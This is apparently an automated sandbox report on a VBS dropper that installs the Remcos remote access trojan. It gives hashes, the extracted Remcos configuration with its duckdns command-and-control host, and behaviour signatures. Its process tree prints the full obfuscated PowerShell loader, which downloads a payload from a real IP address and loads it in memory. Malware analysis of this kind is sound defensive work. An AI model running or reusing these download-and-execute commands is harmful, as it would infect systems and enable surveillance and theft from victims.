Analysis
-
max time kernel
150s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
20-11-2024 08:35
General
-
Target
sostener.vbs
-
Size
3.3MB
-
MD5
619077e3c8387532a2d930e2b86c9ff7
-
SHA1
081166adc2aed980d757c61687838f53ecaf4224
-
SHA256
3c313c19ce509197f848990ef3837d2fdf55ed5d9eb2ddf2f1cd9f35e41bd664
-
SHA512
cce42eacddd12c0a541eacb5a772b5a2b70844154c31264b82a846cda4db488d8142e3cb09caada11a16eceae16884577f439892b2c4465d04df9fffbcff3323
-
SSDEEP
768:iooooLooooLooooLoooorooooLooooLooooLoooocooooLooooLooooLoooorooi:zDnM
Malware Config
Extracted
http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt
Extracted
remcos
RemoteHost
remcosnov24.duckdns.org:4576
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
registros.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-0883UG
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Capturas de pantalla
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Remcos family
-
Blocklisted process makes network request 3 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Powershell Invoke Web Request.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 23 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sostener.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT☹Hk☹cwB0☹GU☹bQ☹u☹E4☹ZQB0☹C4☹UwBl☹HI☹dgBp☹GM☹ZQBQ☹G8☹aQBu☹HQ☹TQBh☹G4☹YQBn☹GU☹cgBd☹Do☹OgBT☹GU☹YwB1☹HI☹aQB0☹Hk☹U☹By☹G8☹d☹Bv☹GM☹bwBs☹C☹☹PQ☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBO☹GU☹d☹☹u☹FM☹ZQBj☹HU☹cgBp☹HQ☹eQBQ☹HI☹bwB0☹G8☹YwBv☹Gw☹V☹B5☹H☹☹ZQBd☹Do☹OgBU☹Gw☹cw☹x☹DI☹Ow☹k☹EM☹QwBS☹Gg☹bQ☹g☹D0☹I☹☹n☹Gg☹d☹B0☹H☹☹Og☹v☹C8☹OQ☹x☹C4☹Mg☹w☹DI☹Lg☹y☹DM☹Mw☹u☹DE☹Ng☹5☹C8☹V☹Bh☹Gs☹LwBS☹GU☹Zw☹v☹E0☹YQBy☹Ho☹LwBE☹FI☹Rw☹v☹FI☹V☹BD☹C8☹QQBE☹C8☹Z☹Bs☹Gw☹LgB0☹Hg☹d☹☹n☹C☹☹Ow☹k☹EM☹WQBy☹Eo☹U☹☹g☹D0☹I☹☹o☹C☹☹WwBT☹Hk☹cwB0☹GU☹bQ☹u☹Ek☹Tw☹u☹F☹☹YQB0☹Gg☹XQ☹6☹Do☹RwBl☹HQ☹V☹Bl☹G0☹c☹BQ☹GE☹d☹Bo☹Cg☹KQ☹g☹Cs☹I☹☹n☹GQ☹b☹Bs☹D☹☹MQ☹u☹HQ☹e☹B0☹Cc☹I☹☹p☹C☹☹OwBJ☹G4☹dgBv☹Gs☹ZQ☹t☹Fc☹ZQBi☹FI☹ZQBx☹HU☹ZQBz☹HQ☹I☹☹t☹FU☹UgBJ☹C☹☹J☹BD☹EM☹UgBo☹G0☹I☹☹t☹E8☹dQB0☹EY☹aQBs☹GU☹I☹☹k☹EM☹WQBy☹Eo☹U☹☹g☹C0☹VQBz☹GU☹QgBh☹HM☹aQBj☹F☹☹YQBy☹HM☹aQBu☹Gc☹I☹☹7☹GM☹bQBk☹C4☹ZQB4☹GU☹I☹☹v☹GM☹I☹☹7☹H☹☹aQBu☹Gc☹I☹☹x☹DI☹Nw☹u☹D☹☹Lg☹w☹C4☹MQ☹g☹Ds☹I☹Bw☹G8☹dwBl☹HI☹cwBo☹GU☹b☹Bs☹C4☹ZQB4☹GU☹I☹☹t☹GM☹bwBt☹G0☹YQBu☹GQ☹I☹B7☹C☹☹J☹BD☹Fk☹cgBK☹F☹☹I☹☹9☹C☹☹K☹☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBJ☹E8☹LgBQ☹GE☹d☹Bo☹F0☹Og☹6☹Ec☹ZQB0☹FQ☹ZQBt☹H☹☹U☹Bh☹HQ☹a☹☹o☹Ck☹I☹☹r☹C☹☹JwBk☹Gw☹b☹☹w☹DE☹LgB0☹Hg☹d☹☹n☹C☹☹KQ☹g☹Ds☹J☹Bn☹Ec☹aQBt☹EE☹I☹☹9☹C☹☹K☹☹g☹Ec☹ZQB0☹C0☹QwBv☹G4☹d☹Bl☹G4☹d☹☹g☹C0☹U☹Bh☹HQ☹a☹☹g☹CQ☹QwBZ☹HI☹SgBQ☹C☹☹KQ☹g☹Ds☹I☹B9☹C☹☹Ow☹k☹Hg☹awBs☹Gw☹a☹☹g☹D0☹I☹☹n☹D☹☹Jw☹g☹Ds☹J☹Bi☹H☹☹dgBy☹HY☹I☹☹9☹C☹☹Jw☹l☹Eo☹awBR☹GE☹cwBE☹GY☹ZwBy☹FQ☹Zw☹l☹Cc☹I☹☹7☹Fs☹QgB5☹HQ☹ZQBb☹F0☹XQ☹g☹CQ☹bQBx☹G8☹bgBz☹C☹☹PQ☹g☹Fs☹cwB5☹HM☹d☹Bl☹G0☹LgBD☹G8☹bgB2☹GU☹cgB0☹F0☹Og☹6☹EY☹cgBv☹G0☹QgBh☹HM☹ZQ☹2☹DQ☹UwB0☹HI☹aQBu☹Gc☹K☹☹g☹Cg☹I☹BH☹GU☹d☹☹t☹EM☹bwBu☹HQ☹ZQBu☹HQ☹I☹☹t☹F☹☹YQB0☹Gg☹I☹☹k☹EM☹WQBy☹Eo☹U☹☹g☹Ck☹LgBy☹GU☹c☹Bs☹GE☹YwBl☹Cg☹Jw☹k☹CQ☹Jw☹s☹Cc☹QQ☹n☹Ck☹I☹☹p☹C☹☹OwBb☹FM☹eQBz☹HQ☹ZQBt☹C4☹QQBw☹H☹☹R☹Bv☹G0☹YQBp☹G4☹XQ☹6☹Do☹QwB1☹HI☹cgBl☹G4☹d☹BE☹G8☹bQBh☹Gk☹bg☹u☹Ew☹bwBh☹GQ☹K☹☹k☹G0☹cQBv☹G4☹cw☹p☹C4☹RwBl☹HQ☹V☹B5☹H☹☹ZQ☹o☹Cc☹V☹Bl☹Gg☹dQBs☹GM☹a☹Bl☹HM☹W☹B4☹Fg☹e☹B4☹C4☹QwBs☹GE☹cwBz☹DE☹Jw☹p☹C4☹RwBl☹HQ☹TQBl☹HQ☹a☹Bv☹GQ☹K☹☹n☹E0☹cwBx☹EI☹SQBi☹Fk☹Jw☹p☹C4☹SQBu☹HY☹bwBr☹GU☹K☹☹k☹G4☹dQBs☹Gw☹L☹☹g☹Fs☹bwBi☹Go☹ZQBj☹HQ☹WwBd☹F0☹I☹☹o☹C☹☹JwBk☹EE☹Qg☹0☹EE☹S☹BR☹EE☹T☹Bn☹EI☹MgBB☹Ec☹O☹BB☹GI☹ZwBB☹DU☹QQBE☹EU☹QQBj☹Hc☹QgB2☹EE☹S☹BN☹EE☹T☹B3☹EI☹egBB☹Ec☹UQBB☹Fk☹UQBC☹HY☹QQBH☹Hc☹QQBi☹Gc☹Qg☹z☹EE☹Rw☹4☹EE☹WgBB☹EE☹dgBB☹EQ☹awBB☹E0☹UQBC☹Gw☹QQBI☹Ek☹QQBZ☹Gc☹QgB0☹EE☹RwBV☹EE☹YQBR☹EI☹MgBB☹Ec☹O☹BB☹GI☹ZwBB☹HY☹QQBD☹D☹☹QQBM☹FE☹QQ☹y☹EE☹R☹Bj☹EE☹TgBR☹EE☹M☹BB☹Eg☹SQBB☹GI☹dwBC☹D☹☹QQBH☹E0☹QQBa☹FE☹QgBv☹EE☹Qw☹4☹EE☹WgB3☹EI☹eQBB☹Ec☹O☹BB☹Ew☹ZwBC☹D☹☹QQBH☹FU☹QQBh☹Hc☹QgBq☹EE☹S☹BV☹EE☹WQBn☹EI☹M☹BB☹Ec☹awBB☹Fk☹ZwBB☹HY☹QQBD☹Dg☹QQBP☹Gc☹QgB6☹EE☹S☹BB☹EE☹Z☹BB☹EI☹M☹BB☹Ec☹ZwBB☹Cc☹I☹☹s☹C☹☹J☹Bi☹H☹☹dgBy☹HY☹I☹☹s☹C☹☹JwBf☹F8☹XwBf☹F8☹cwBj☹HM☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹LQ☹t☹C0☹LQ☹t☹C0☹LQ☹n☹Cw☹I☹☹k☹Hg☹awBs☹Gw☹a☹☹s☹C☹☹Jw☹x☹Cc☹L☹☹g☹Cc☹UgBv☹GQ☹YQ☹n☹C☹☹KQ☹p☹C☹☹Ow☹=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('☹','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs');powershell $Yolopolhggobek;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c4⤵
-
-
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.0.0.14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD51ae7492d11968e15ed69750f5e74c959
SHA165379798b45fac2b40297f1950825211cd9d8222
SHA2567d6a4c21d0d2f8384eed54bbf88c170f036eeedc04bfd0bd6c8e8de2196f1893
SHA5125a999d99c66b669b13fc01118e3fa328599ed104c1e0e08799e91364e2ccc00ea5aec7ef9a4671164fb6d849494e5ec715c339a9c68fb38b8c3af19dee395e78
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
1KB
MD5337c07f569ad6ca7a65aa2555fd10732
SHA1956325966fecfb059d8894a42d4eba1b2f41344b
SHA2563a68a14b62309667f478e59337cf4573aa3a3a78c1f218ce62ac75d06673cfdc
SHA512a32b6fb9b366c460eefc77bf28feba6ad305fd78099bd0e303a06634027d83dd95dadd85120a02414d5c45ec3ecc695d04429a1229a0ed7f9f166fa803a68283
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
104KB
MD54f4cc2baf7a98aa5c29c3b21e48725cf
SHA1c25ebcb9b400d9fdab1655e5666e986731397840
SHA2561fe40914bf08072551be2995fa32e2567b9b394d0dfdb18a9ea99cc9cf3af001
SHA512c46a7282c617e78922f2dbd64bba2ba2161b54320ed04a81428f152d2dd64a001d15b7a18bc2eba56579d5000d345b13d06c8e140e278f14be36dfaa87da5c8c
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
508KB
-
Filesize
88KB
-
Filesize
88KB